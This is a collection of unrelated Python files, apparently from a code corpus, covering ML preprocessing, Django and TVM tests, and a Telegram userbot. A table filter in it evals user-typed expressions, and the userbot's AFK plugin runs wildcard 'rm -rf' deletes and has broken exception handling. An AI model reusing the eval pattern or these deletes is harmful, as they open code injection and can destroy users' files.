# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import nltk
from nltk import word_tokenize
import json
import tensorrt as trt
def preprocess(text):
try:
nltk.data.find('tokenizers/punkt')
except LookupError:
nltk.download('punkt')
tokens = word_tokenize(text)
# split into lower-case word tokens, in numpy array with shape of (seq, 1)
words = np.asarray([w.lower() for w in tokens]).reshape(-1, 1)
# split words into chars, in numpy array with shape of (seq, 1, 1, 16)
chars = [[c for c in t][:16] for t in tokens]
chars = [cs+['']*(16-len(cs)) for cs in chars]
chars = np.asarray(chars).reshape(-1, 1, 1, 16)
return words, chars
def get_map_func(filepath):
file = open(filepath)
category_map = json.load(file)
category_mapper = dict(zip(category_map["cats_strings"], category_map["cats_int64s"]))
default_int64 = category_map["default_int64"]
func = lambda s: category_mapper.get(s, default_int64)
return np.vectorize(func)
def get_inputs(context, query):
cw, cc = preprocess(context)
qw, qc = preprocess(query)
context_word_func = get_map_func("CategoryMapper_4.json")
context_char_func = get_map_func("CategoryMapper_5.json")
query_word_func = get_map_func("CategoryMapper_6.json")
query_char_func = get_map_func("CategoryMapper_7.json")
cw_input = context_word_func(cw).astype(trt.nptype(trt.int32)).ravel()
cc_input = context_char_func(cc).astype(trt.nptype(trt.int32)).ravel()
qw_input = query_word_func(qw).astype(trt.nptype(trt.int32)).ravel()
qc_input = query_char_func(qc).astype(trt.nptype(trt.int32)).ravel()
return cw_input, cc_input, qw_input, qc_input
|
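The get_map_func step above is essentially a vocabulary lookup vectorized over a numpy array of token strings. A toy, self-contained version of that mapping, with an invented vocabulary:

import numpy as np

vocab = {'the': 1, 'cat': 2, 'sat': 3}    # invented vocabulary
default_id = 0                            # id for out-of-vocabulary tokens
to_ids = np.vectorize(lambda s: vocab.get(s, default_id))

words = np.asarray(['the', 'cat', 'flew']).reshape(-1, 1)
print(to_ids(words))  # [[1] [2] [0]]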
py | 1a49faffdd6c0c12660722373166591b71161af3 | import _plotly_utils.basevalidators
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name="size", parent_name="scatterternary.marker", **kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
min=kwargs.pop("min", 0),
**kwargs,
)
|
py | 1a49fb2679b31ad6687925cf7268a39071b9e65f | from flask import cli
from flask.cli import FlaskGroup
from lps import create_app, db
from lps.models import *
from lps.seeds import seed_database, export_seed
from lps.mail_utils import send_alert_mail
app = create_app()
cli = FlaskGroup(create_app=create_app)
# DATABASE COMMANDS
@cli.command("seed_db")
def seed_db():
print("======== STARTING DATABASE SEED ========")
seed_database(db)
print("======== SEED COMPLETED ========")
@cli.command("reset_db")
def reset_db():
LocatorPoint.query.delete()
Unit.query.delete()
ApiKey.query.delete()
User.query.delete()
db.session.commit()
print("======== RESET DATABASE ========")
@cli.command("export_db")
def export_db():
print("======== EXPORTING DATABASE SEED ========")
export_seed()
print("======== EXPORT COMPLETED ========")
# MAIL SERVER COMMANDS
@cli.command("test_mail")
def test_mail():
send_alert_mail("")
if __name__ == '__main__':
cli() |
py | 1a49fba92753e7f89d7fc9e8ae9a8f981ef2fcdd | # -*- coding: utf-8 -*-
"""column filter"""
__all__ = ['Filter', 'FilterType']
import abc
import enum
import pandas as pd
import re
from .default import ValueFetcher
from .type import basic_column_type
from pyqttable import const
from typing import List, Optional, Any
class FilterType(enum.Enum):
"""Column filter type"""
Exact = 'exact'
Contain = 'contain'
Regex = 'regex'
Expression = 'expression'
MultipleChoice = 'multiple_choice'
class Filter(metaclass=abc.ABCMeta):
"""
Column filter, including:
- filter type
- filter widget info
- filter function
"""
# Placeholder text for filter widget
PlaceHolderText = ''
def __init__(self, filter_type):
self.type = filter_type
@classmethod
def make(cls, fetcher: ValueFetcher):
"""Make Filter from ValueFetcher"""
filter_type = fetcher.get('filter_type')
# If filter_type is already Filter, just return
if isinstance(filter_type, cls):
return filter_type
# Convert filter_type to enum
try:
filter_type = FilterType(filter_type)
except Exception as e:
_ = e
else:
# Make Filter instance according to FilterType
if filter_type == FilterType.Exact:
return ExactFilter(filter_type)
elif filter_type == FilterType.Contain:
return ContainFilter(filter_type)
elif filter_type == FilterType.Regex:
return RegexFilter(filter_type)
elif filter_type == FilterType.Expression:
return ExpressionFilter(filter_type)
elif filter_type == FilterType.MultipleChoice:
return MultipleChoice(filter_type)
# If FilterType is invalid, raise error
raise TypeError(f'invalid filter type \'{filter_type}\'')
def filter(self, df: pd.DataFrame, by: str, filter_value: Any,
to_string: Optional[callable] = None,
to_value: Optional[callable] = None) -> pd.DataFrame:
"""
Filter DataFrame
Parameters
----------
df: input DataFrame to be filtered
by: column key to do filtering
filter_value: current value passed by filter widget
to_string: function to convert data from original format to string
to_value: function to convert data from string to original format
Returns
-------
Filtered DataFrame
"""
kwargs = dict(filter_value=filter_value, to_string=to_string, to_value=to_value)
return df[df[by].apply(self._filter_apply, **kwargs)].copy()
def _filter_apply(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if self.common_filter(content, filter_value):
return True
try:
return self.filter_each(content, filter_value, to_string, to_value)
except Exception as e:
_ = e
return False
@staticmethod
def common_filter(content: Any, filter_value: Any) -> bool:
"""Common filter for all kinds of Filters"""
if isinstance(filter_value, str):
if filter_value == '#blank':
return False if content else True
elif filter_value == '#non-blank':
return True if content else False
return False
@abc.abstractmethod
def filter_each(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
"""
Method to filter each value
Parameters
----------
content: cell data to be filtered
filter_value: current value passed by filter widget
to_string: function to convert data from original format to string
to_value: function to convert data from string to original format
Returns
-------
Remain in result or not
"""
...
class ExactFilter(Filter):
"""Perfect match filter"""
PlaceHolderText = 'Exact'
def filter_each(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if isinstance(filter_value, str):
return to_string(content) == filter_value
else:
return content == filter_value
class ContainFilter(Filter):
"""Contain filter"""
PlaceHolderText = 'Contain'
def filter_each(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if isinstance(filter_value, str):
return to_string(content).find(filter_value) > -1
else:
return False
class RegexFilter(Filter):
"""Filtered by regex expression"""
PlaceHolderText = 'Regex'
def filter_each(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if isinstance(filter_value, str):
return True if re.findall(filter_value, to_string(content)) else False
else:
return False
class ExpressionFilter(Filter):
"""Filtered by python expression"""
PlaceHolderText = 'Express'
def filter_each(self, content: Any, filter_value: Any,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if isinstance(filter_value, str):
if not isinstance(content, tuple(basic_column_type)):
content = to_string(content)
expression = f'{content!r} {filter_value}'
try:
res = eval(expression)
except Exception as e:
_ = e
return False
else:
return False if res is False else True
else:
return False
class MultipleChoice(Filter):
"""Filter with multiple choices"""
PlaceHolderText = 'Multi'
Delimiter = const.DefaultDelimiter
def filter_each(self, content: str, filter_value: str,
to_string: Optional[callable],
to_value: Optional[callable]) -> bool:
if isinstance(filter_value, str):
filter_list = filter_value.split(self.Delimiter)
return to_string(content) in filter_list
else:
return False
if __name__ == '__main__':
pass
|
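A hedged usage sketch for the filters above, assuming the module is importable as column_filter (the name is an assumption): a ContainFilter keeps the rows whose stringified cell contains the widget text.

import pandas as pd
from column_filter import ContainFilter, FilterType  # hypothetical module name

df = pd.DataFrame({'name': ['alice', 'bob', 'carol'], 'age': [31, 27, 44]})
flt = ContainFilter(FilterType.Contain)
print(flt.filter(df, by='name', filter_value='ar', to_string=str))  # keeps 'carol'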
py | 1a49fbadf4ba724aebb1a48d66a79b28c08a77c5 | # Copyright (C) 2020 TeamUltroid
# Ported by X_ImFine
# Recode by @mrismanaziz
# RecodeV2 by @PacarFerdilla
import asyncio
import os
from datetime import datetime
from telethon import events
from telethon.tl import functions, types
from userbot.events import register
from userbot import ( # noqa pylint: disable=unused-import isort:skip
AFKREASON,
ALIVE_NAME,
BOTLOG,
BOTLOG_CHATID,
CMD_HELP,
COUNT_MSG,
ISAFK,
PM_AUTO_BAN,
USERS,
bot,
)
global USER_AFK
global afk_time
global last_afk_message
global last_afk_msg
global afk_start
global afk_end
USER_AFK = {}
afk_time = None
last_afk_message = {}
last_afk_msg = {}
afk_start = {}
@bot.on(events.NewMessage(outgoing=True))
@bot.on(events.MessageEdited(outgoing=True))
async def set_not_afk(event):
global USER_AFK
global afk_time
global last_afk_message
global afk_start
global afk_end
back_alive = datetime.now()
afk_end = back_alive.replace(microsecond=0)
if afk_start != {}:
total_afk_time = str((afk_end - afk_start))
current_message = event.message.message
if "afk" not in current_message and "yes" in USER_AFK:
try:
if pic.endswith((".tgs", ".webp")):
shite = await bot.send_message(event.chat_id, file=pic)
shites = await bot.send_message(
event.chat_id,
f"🔥 {ALIVE_NAME} __**Sudah Kembali Online...**__\n**Sejak :** `{total_afk_time}` **Yang Lalu**",
)
else:
shite = await bot.send_message(
event.chat_id,
f"🔥 __**Sudah Kembali Online...**__\n**Ada Sejak :** `{total_afk_time}` **Yang Lalu**",
file=pic,
)
except BaseException:
shite = await bot.send_message(
event.chat_id,
f"🔥 __**Sudah Kembali Online...**__\n**Kembali Chat Sejak :** `{total_afk_time}` **Yang Lalu**",
)
except BaseException:
pass
await asyncio.sleep(6)
await shite.delete()
try:
await shites.delete()
except BaseException:
pass
USER_AFK = {}
afk_time = None
os.system("rm -rf *.webp")
os.system("rm -rf *.mp4")
os.system("rm -rf *.tgs")
os.system("rm -rf *.png")
os.system("rm -rf *.jpg")
@bot.on(events.NewMessage(incoming=True,
func=lambda e: bool(e.mentioned or e.is_private)))
async def on_afk(event):
if event.fwd_from:
return
global USER_AFK
global afk_time
global last_afk_message
global afk_start
global afk_end
back_alivee = datetime.now()
afk_end = back_alivee.replace(microsecond=0)
if afk_start != {}:
total_afk_time = str((afk_end - afk_start))
current_message_text = event.message.message.lower()
if "afk" in current_message_text:
return False
if USER_AFK and not (await event.get_sender()).bot:
msg = None
if reason:
message_to_reply = (
f"**{ALIVE_NAME} Sedang AFK**\n\n**Sejak :** `{total_afk_time}` **Yang Lalu**\n" +
f"**Karena :** `{reason}`")
else:
message_to_reply = f"**Maaf King {ALIVE_NAME} Sedang AFK**\n\n**Sejak :** `{total_afk_time}` **Yang Lalu**"
try:
if pic.endswith((".tgs", ".webp")):
msg = await event.reply(file=pic)
msgs = await event.reply(message_to_reply)
else:
msg = await event.reply(message_to_reply, file=pic)
except BaseException:
msg = await event.reply(message_to_reply)
await asyncio.sleep(2.5)
if event.chat_id in last_afk_message:
await last_afk_message[event.chat_id].delete()
try:
if event.chat_id in last_afk_msg:
await last_afk_msg[event.chat_id].delete()
except BaseException:
pass
last_afk_message[event.chat_id] = msg
try:
if msgs:
last_afk_msg[event.chat_id] = msgs
except BaseException:
pass
@register(
outgoing=True, pattern=r"^\.afk(?: |$)(.*)", disable_errors=True
) # pylint:disable=E0602
async def _(event):
if event.fwd_from:
return
reply = await event.get_reply_message()
global USER_AFK
global afk_time
global last_afk_message
global last_afk_msg
global afk_start
global afk_end
global reason
global pic
USER_AFK = {}
afk_time = None
last_afk_message = {}
last_afk_msg = {}
afk_end = {}
start_1 = datetime.now()
afk_start = start_1.replace(microsecond=0)
reason = event.pattern_match.group(1)
if reply:
pic = await event.client.download_media(reply)
else:
pic = None
if not USER_AFK:
last_seen_status = await bot(
functions.account.GetPrivacyRequest(types.InputPrivacyKeyStatusTimestamp())
)
if isinstance(last_seen_status.rules, types.PrivacyValueAllowAll):
            afk_time = datetime.now()
USER_AFK = f"yes : {reason} {pic}"
if reason:
try:
if pic.endswith((".tgs", ".webp")):
await bot.send_message(event.chat_id, file=pic)
await bot.send_message(
event.chat_id,
f"**King {ALIVE_NAME} Telah AFK**\n**Karena :** `{reason}`",
)
else:
await bot.send_message(
event.chat_id,
f"**King {ALIVE_NAME} Telah AFK**\n**Karena :** `{reason}`",
file=pic,
)
except BaseException:
await bot.send_message(
event.chat_id,
f"**King {ALIVE_NAME} Telah AFK**\n**Karena :** `{reason}`",
)
else:
try:
if pic.endswith((".tgs", ".webp")):
await bot.send_message(event.chat_id, file=pic)
await bot.send_message(
event.chat_id, f"**King {ALIVE_NAME} Telah AFK...**"
)
else:
await bot.send_message(
event.chat_id,
f"**King {ALIVE_NAME} Telah AFK...**",
file=pic,
)
except BaseException:
await bot.send_message(
event.chat_id, f"**King {ALIVE_NAME} Telah AFK...**"
)
await event.delete()
try:
if reason and pic:
if pic.endswith((".tgs", ".webp")):
await bot.send_message(BOTLOG_CHATID, file=pic)
await bot.send_message(
BOTLOG_CHATID,
f"#AFK\n**{ALIVE_NAME} Telah AFK**\n**Karena :** `{reason}`",
)
else:
await bot.send_message(
BOTLOG_CHATID,
f"#AFK\n**{ALIVE_NAME} Sedang AFK**\n**Karena :** `{reason}`",
file=pic,
)
elif reason:
await bot.send_message(
BOTLOG_CHATID,
f"#AFK\n**{ALIVE_NAME} Sedang AFK**\n**Karena :** `{reason}`",
)
elif pic:
if pic.endswith((".tgs", ".webp")):
await bot.send_message(BOTLOG_CHATID, file=pic)
await bot.send_message(
BOTLOG_CHATID, f"#AFK\n**{ALIVE_NAME} Telah AFK**"
)
else:
await bot.send_message(
BOTLOG_CHATID,
f"#AFK\n**{ALIVE_NAME} Sedang AFK**",
file=pic,
)
else:
await bot.send_message(
BOTLOG_CHATID, f"#AFK\n**{ALIVE_NAME} Masih aja AFK**"
)
except Exception as e:
        print(str(e))
CMD_HELP.update(
{
"afk": "**✘ Plugin : **`afk`\
\n\n • **Perintah :** `.afk` <alasan> bisa <sambil reply sticker/foto/gif/media>\
\n • **Function : **Memberi tahu kalau King sedang afk bisa dengan menampilkan media keren ketika seseorang menandai atau membalas salah satu pesan atau dm Anda\
\n\n • **Notes :** __Bila ada orang spam berlebihan ke Anda , tinggal ketik__ `.block`\
"
}
)
|
py | 1a49fbb66254751629fed826f5c6e77a28dacc0c | # python server.py no4_2_app:app
from no4_1_framework import MyWSGIFramework
def get(environ, start_response):
start_response('200 OK', [('Content-Type', 'text/plain')])
return [b"Hello, world by framework."]
def hoge(environ, start_response):
start_response('200 OK', [('Content-Type', 'text/plain')])
return [b"hoge by framework"]
app = MyWSGIFramework([
('/', get),
('/hoge', hoge),
]) |
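MyWSGIFramework itself lives in no4_1_framework, which is not shown here; as a rough idea of the shape such a router might take (an assumption for illustration, not the actual framework code):

class SimpleRouter(object):
    """Dispatch WSGI requests to the handler registered for PATH_INFO."""

    def __init__(self, routes):
        self.routes = dict(routes)  # [('/', handler), ...] -> {'/': handler}

    def __call__(self, environ, start_response):
        handler = self.routes.get(environ.get('PATH_INFO', '/'))
        if handler is None:
            start_response('404 Not Found', [('Content-Type', 'text/plain')])
            return [b'Not Found']
        return handler(environ, start_response)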
py | 1a49fbc642c4551e2a32872cf8e121dcb36fa5b6 | from django.test import TestCase
from django_ses.views import (emails_parse, stats_to_list, quota_parse,
sum_stats)
# Mock of what boto's SESConnection.get_send_statistics() returns
STATS_DICT = {
u'SendDataPoints': [
{
u'Bounces': u'1',
u'Complaints': u'0',
u'DeliveryAttempts': u'11',
u'Rejects': u'0',
u'Timestamp': u'2011-02-28T13:50:00Z',
},
{
u'Bounces': u'1',
u'Complaints': u'0',
u'DeliveryAttempts': u'3',
u'Rejects': u'0',
u'Timestamp': u'2011-02-24T23:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'2',
u'DeliveryAttempts': u'8',
u'Rejects': u'0',
u'Timestamp': u'2011-02-24T16:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'2',
u'DeliveryAttempts': u'33',
u'Rejects': u'0',
u'Timestamp': u'2011-02-25T20:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'3',
u'Rejects': u'3',
u'Timestamp': u'2011-02-28T23:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'2',
u'Rejects': u'3',
u'Timestamp': u'2011-02-25T22:50:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'6',
u'Rejects': u'0',
u'Timestamp': u'2011-03-01T13:20:00Z',
},
],
}
QUOTA_DICT = {
u'GetSendQuotaResponse': {
u'GetSendQuotaResult': {
u'Max24HourSend': u'10000.0',
u'MaxSendRate': u'5.0',
u'SentLast24Hours': u'1677.0'
},
u'ResponseMetadata': {
u'RequestId': u'8f100233-44e7-11e0-a926-a198963635d8'
}
}
}
VERIFIED_EMAIL_DICT = {
u'ListVerifiedEmailAddressesResponse': {
u'ListVerifiedEmailAddressesResult': {
u'VerifiedEmailAddresses': [
u'[email protected]',
u'[email protected]',
u'[email protected]'
]
},
u'ResponseMetadata': {
u'RequestId': u'9afe9c18-44ed-11e0-802a-25a1a14c5a6e'
}
}
}
class StatParsingTest(TestCase):
def setUp(self):
self.stats_dict = STATS_DICT
self.quota_dict = QUOTA_DICT
self.emails_dict = VERIFIED_EMAIL_DICT
def test_stat_to_list(self):
expected_list = [
{
u'Bounces': u'0',
u'Complaints': u'2',
u'DeliveryAttempts': u'8',
u'Rejects': u'0',
u'Timestamp': u'2011-02-24T16:35:00Z',
},
{
u'Bounces': u'1',
u'Complaints': u'0',
u'DeliveryAttempts': u'3',
u'Rejects': u'0',
u'Timestamp': u'2011-02-24T23:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'2',
u'DeliveryAttempts': u'33',
u'Rejects': u'0',
u'Timestamp': u'2011-02-25T20:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'2',
u'Rejects': u'3',
u'Timestamp': u'2011-02-25T22:50:00Z',
},
{
u'Bounces': u'1',
u'Complaints': u'0',
u'DeliveryAttempts': u'11',
u'Rejects': u'0',
u'Timestamp': u'2011-02-28T13:50:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'3',
u'Rejects': u'3',
u'Timestamp': u'2011-02-28T23:35:00Z',
},
{
u'Bounces': u'0',
u'Complaints': u'0',
u'DeliveryAttempts': u'6',
u'Rejects': u'0',
u'Timestamp': u'2011-03-01T13:20:00Z',
},
]
actual = stats_to_list(self.stats_dict, localize=False)
self.assertEqual(len(actual), len(expected_list))
self.assertEqual(actual, expected_list)
def test_quota_parse(self):
expected = {
u'Max24HourSend': u'10000.0',
u'MaxSendRate': u'5.0',
u'SentLast24Hours': u'1677.0',
}
actual = quota_parse(self.quota_dict)
self.assertEqual(actual, expected)
def test_emails_parse(self):
expected_list = [
u'[email protected]',
u'[email protected]',
u'[email protected]',
]
actual = emails_parse(self.emails_dict)
self.assertEqual(len(actual), len(expected_list))
self.assertEqual(actual, expected_list)
def test_sum_stats(self):
expected = {
'Bounces': 2,
'Complaints': 4,
'DeliveryAttempts': 66,
'Rejects': 6,
}
stats = stats_to_list(self.stats_dict)
actual = sum_stats(stats)
self.assertEqual(actual, expected)
|
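The expected totals in test_sum_stats pin down what sum_stats has to do: add up the integer-valued counters across all data points. A self-contained sketch of that aggregation (the function name here is an assumption; the real one lives in django_ses.views):

def sum_send_stats(data_points,
                   fields=('Bounces', 'Complaints', 'DeliveryAttempts', 'Rejects')):
    # SES reports the counters as strings, so cast before summing
    return {field: sum(int(point[field]) for point in data_points) for field in fields}

# sum_send_stats(STATS_DICT['SendDataPoints'])
# -> {'Bounces': 2, 'Complaints': 4, 'DeliveryAttempts': 66, 'Rejects': 6}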
py | 1a49fc5a01846deca06ecd4647465399796a85f2 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, missing-docstring, no-else-return
"""Unit tests for the Relay VM serialization and deserialization."""
import pytest
import numpy as np
import tvm
from tvm.runtime import vm as _vm
from tvm.relay import vm as rly_vm
from tvm import relay
from tvm.relay.scope_builder import ScopeBuilder
from tvm.relay import transform
from tvm.relay.prelude import Prelude
from tvm.contrib import utils
from tvm.relay import testing
def create_exec(f, target="llvm", params=None):
if isinstance(f, relay.Expr):
mod = tvm.IRModule()
mod["main"] = f
executable = rly_vm.compile(mod, target=target, params=params)
return executable
else:
assert isinstance(f, tvm.IRModule), "expected mod as tvm.IRModule"
executable = rly_vm.compile(f, target=target, params=params)
return executable
def get_serialized_output(mod, *data, params=None, target="llvm", device=tvm.cpu()):
exe = create_exec(mod, target, params=params)
code, lib = exe.save()
des_exec = _vm.Executable.load_exec(code, lib)
des_vm = _vm.VirtualMachine(des_exec, device)
result = des_vm.run(*data)
return result
def run_network(mod, params, dtype="float32"):
def get_vm_output(mod, data, params, target, device, dtype="float32"):
result = relay.create_executor("vm", mod=mod, device=device).evaluate()(data, **params)
return result.numpy().astype(dtype)
data_shape = [int(x) for x in mod["main"].checked_type.arg_types[0].shape]
data = np.random.uniform(size=data_shape).astype(dtype)
target = "llvm"
dev = tvm.cpu(0)
tvm_out = get_vm_output(mod, tvm.nd.array(data.astype(dtype)), params, target, dev, dtype)
vm_out = get_serialized_output(
mod, tvm.nd.array(data.astype(dtype)), params=params, target=target, device=dev
)
tvm.testing.assert_allclose(vm_out.numpy().astype(dtype), tvm_out, rtol=1e-5, atol=1e-5)
def test_serializer():
mod = tvm.IRModule({})
a = relay.const(1.0, "float32")
x = relay.var("x", shape=(10, 10), dtype="float32")
f1 = relay.Function([x], x + a)
glb_f1 = relay.GlobalVar("f1")
mod[glb_f1] = f1
# TODO(@jroesch): look into optimizing away the need to do this
mod = transform.InferType()(mod)
b = relay.const(2.0, "float32")
y = relay.var("y", shape=(10, 10), dtype="float32")
f2 = relay.Function([y], y - b)
glb_f2 = relay.GlobalVar("f2")
mod[glb_f2] = f2
# TODO(@jroesch): look into optimizing away the need to do this
mod = transform.InferType()(mod)
x1 = relay.var("x1", shape=(10, 10), dtype="float32")
y1 = relay.var("y1", shape=(10, 10), dtype="float32")
main = relay.Function([x1, y1], glb_f1(x1) * glb_f2(y1))
mod["main"] = main
exe = create_exec(mod)
glbs = exe.globals
assert len(glbs) == 3
assert "f1" in glbs
assert "f2" in glbs
assert "main" in glbs
prim_ops = exe.primitive_ops
assert any(item.startswith("vm_mod_fused_add") for item in prim_ops)
assert any(item.startswith("vm_mod_fused_subtract") for item in prim_ops)
assert any(item.startswith("vm_mod_fused_multiply") for item in prim_ops)
code = exe.bytecode
assert "main(x1, y1)" in code
assert "f1(x)" in code
assert "f2(y)" in code
code, lib = exe.save()
assert isinstance(code, bytearray)
assert isinstance(lib, tvm.runtime.Module)
def test_save_load():
x = relay.var("x", shape=(10, 10))
f = relay.Function([x], x + x)
x_data = np.random.rand(10, 10).astype("float32")
# serialize.
vm = create_exec(f)
code, lib = vm.save()
assert isinstance(code, bytearray)
# save and load the code and lib file.
tmp = utils.tempdir()
path_lib = tmp.relpath("lib.so")
lib.export_library(path_lib)
with open(tmp.relpath("code.ro"), "wb") as fo:
fo.write(code)
loaded_lib = tvm.runtime.load_module(path_lib)
loaded_code = bytearray(open(tmp.relpath("code.ro"), "rb").read())
# deserialize.
des_exec = _vm.Executable.load_exec(loaded_code, loaded_lib)
des_vm = _vm.VirtualMachine(des_exec, tvm.cpu())
res = des_vm.run(x_data)
tvm.testing.assert_allclose(res.numpy(), x_data + x_data)
def test_const():
c = relay.const(1.0, "float32")
x = relay.var("x", shape=(10, 10), dtype="float32")
f = relay.Function([x], x + c)
x_data = np.random.rand(10, 10).astype("float32")
res = get_serialized_output(f, x_data)
tvm.testing.assert_allclose(res.numpy(), x_data + 1)
def test_if():
x = relay.var("x", shape=(10, 10))
y = relay.var("y", shape=(10, 10))
equal = relay.op.equal(x, y)
equal = relay.op.nn.batch_flatten(equal)
f = relay.Function([x, y], relay.If(relay.op.min(equal, axis=[0, 1]), x, y))
x_data = np.random.rand(10, 10).astype("float32")
y_data = np.random.rand(10, 10).astype("float32")
# same
res = get_serialized_output(f, x_data, x_data)
tvm.testing.assert_allclose(res.numpy(), x_data)
# diff
res = get_serialized_output(f, x_data, y_data)
tvm.testing.assert_allclose(res.numpy(), y_data)
def test_loop():
mod = tvm.IRModule({})
sum_up = relay.GlobalVar("sum_up")
i = relay.var("i", shape=[], dtype="int32")
accum = relay.var("accum", shape=[], dtype="int32")
sb = ScopeBuilder()
with sb.if_scope(relay.equal(i, relay.const(0, "int32"))):
sb.ret(accum)
with sb.else_scope():
one_less = relay.subtract(i, relay.const(1, "int32"))
new_accum = relay.add(accum, i)
sb.ret(relay.Call(sum_up, [one_less, new_accum]))
func = relay.Function([i, accum], sb.get())
mod[sum_up] = func
mod = transform.InferType()(mod)
loop_bound = 0
i_data = np.array(loop_bound, dtype="int32")
accum_data = np.array(0, dtype="int32")
iarg = relay.var("i", shape=[], dtype="int32")
aarg = relay.var("accum", shape=[], dtype="int32")
mod["main"] = relay.Function([iarg, aarg], sum_up(iarg, aarg))
result = get_serialized_output(mod, i_data, accum_data)
tvm.testing.assert_allclose(result.numpy(), sum(range(1, loop_bound + 1)))
def test_tuple():
ttype = relay.TupleType([relay.TensorType((1,)), relay.TensorType((10,))])
tup = relay.var("tup", type_annotation=ttype)
f = relay.Function([tup], relay.TupleGetItem(tup, 1))
i_data = np.random.rand(41).astype("float32")
j_data = np.random.rand(10).astype("float32")
result = get_serialized_output(f, (i_data, j_data))
tvm.testing.assert_allclose(result.numpy(), j_data)
def test_adt_list():
mod = tvm.IRModule()
p = Prelude(mod)
_, cons, nil = mod.get_type("List")
l1 = cons(relay.const(1), nil())
l21 = cons(relay.const(2), l1)
l321 = cons(relay.const(3), l21)
f = relay.Function([], l321)
mod["main"] = f
result = get_serialized_output(mod)
assert len(result) == 2
assert len(result[1]) == 2
assert len(result[1][1]) == 2
res = []
res.append(result[0].numpy().tolist())
res.append(result[1][0].numpy().tolist())
res.append(result[1][1][0].numpy().tolist())
tvm.testing.assert_allclose(res, np.array([3, 2, 1]))
def test_adt_compose():
mod = tvm.IRModule()
p = Prelude(mod)
compose = mod.get_global_var("compose")
# add_one = fun x -> x + 1
sb = relay.ScopeBuilder()
x = relay.var("x", "float32")
x1 = sb.let("x1", x)
xplusone = x1 + relay.const(1.0, "float32")
sb.ret(xplusone)
body = sb.get()
add_one = relay.GlobalVar("add_one")
add_one_func = relay.Function([x], body)
# add_two = compose(add_one, add_one)
sb = relay.ScopeBuilder()
y = relay.var("y", "float32")
add_two_func = sb.let("add_two", compose(add_one_func, add_one_func))
add_two_res = add_two_func(y)
sb.ret(add_two_res)
add_two_body = sb.get()
mod[add_one] = add_one_func
f = relay.Function([y], add_two_body)
mod["main"] = f
x_data = np.array(np.random.rand()).astype("float32")
result = get_serialized_output(mod, x_data)
tvm.testing.assert_allclose(result.numpy(), x_data + 2.0)
def test_closure():
x = relay.var("x", shape=())
y = relay.var("y", shape=())
f = relay.Function([x], x + y)
ff = relay.Function([y], f)
clo = ff(relay.const(1.0))
main = clo(relay.const(2.0))
res = get_serialized_output(main)
tvm.testing.assert_allclose(res.numpy(), 3.0)
def test_synthetic():
mod, params = testing.synthetic.get_workload()
run_network(mod, params)
def test_mobilenet():
mod, params = testing.mobilenet.get_workload(batch_size=1)
run_network(mod, params)
def test_vm_shape_of():
x = relay.var("x", shape=(relay.Any(), relay.Any(), relay.Any()), dtype="float32")
relu_x = relay.nn.relu(x)
data = np.random.uniform(size=(2, 3, 4)).astype("float32")
args = [data]
newshape_var = relay.var("newshape", shape=(2,), dtype="int64")
args.append(np.array((1, -1), dtype="int64"))
main = relay.Function([x, newshape_var], relay.reshape(relu_x, newshape=newshape_var))
res = get_serialized_output(main, *args).numpy()
tvm.testing.assert_allclose(res.flatten(), data.flatten())
def test_dynamic_bcast():
dtype = "float32"
x = relay.var("x", shape=(relay.Any(), 2), dtype=dtype)
y = relay.var("y", shape=(3, 2), dtype=dtype)
mod = tvm.IRModule()
mod["main"] = relay.Function([x, y], relay.add(x, y))
x_data = np.random.uniform(size=(1, 2)).astype(dtype)
y_data = np.random.uniform(size=(3, 2)).astype(dtype)
res_np = np.add(x_data, y_data)
for target, dev in testing.enabled_targets():
res = get_serialized_output(mod, *(x_data, y_data), target=target, device=dev)
tvm.testing.assert_allclose(res.numpy(), res_np)
if __name__ == "__main__":
pytest.main([__file__])
|
py | 1a49fd149c4b9c0f99bc8c421bd17db08048249f | from django.contrib.auth import get_user_model
from django.test import TestCase
from django.urls import reverse
from rest_framework import status
from rest_framework.response import Response
from rest_framework.test import APIClient
from core.models import User as UserModel
CREATE_USER_URL = reverse('user:create')
ME_URL = reverse('user:me')
CREATE_TOKEN_URL = reverse('user:token')
User: UserModel = get_user_model()
def create_user(**param) -> User:
return User.objects.create_user(**param)
class PublicUserApiTests(TestCase):
def setUp(self) -> None:
self.client = APIClient()
def test_create_valid_user_success(self):
payload = {
'email': '[email protected]',
'password': 'longpass123',
'name': 'Test Name'
}
res: Response = self.client.post(CREATE_USER_URL, payload)
self.assertEqual(res.status_code, status.HTTP_201_CREATED)
user = User.objects.get(**res.data)
self.assertTrue(user.check_password(payload['password']))
self.assertNotIn('password', res.data)
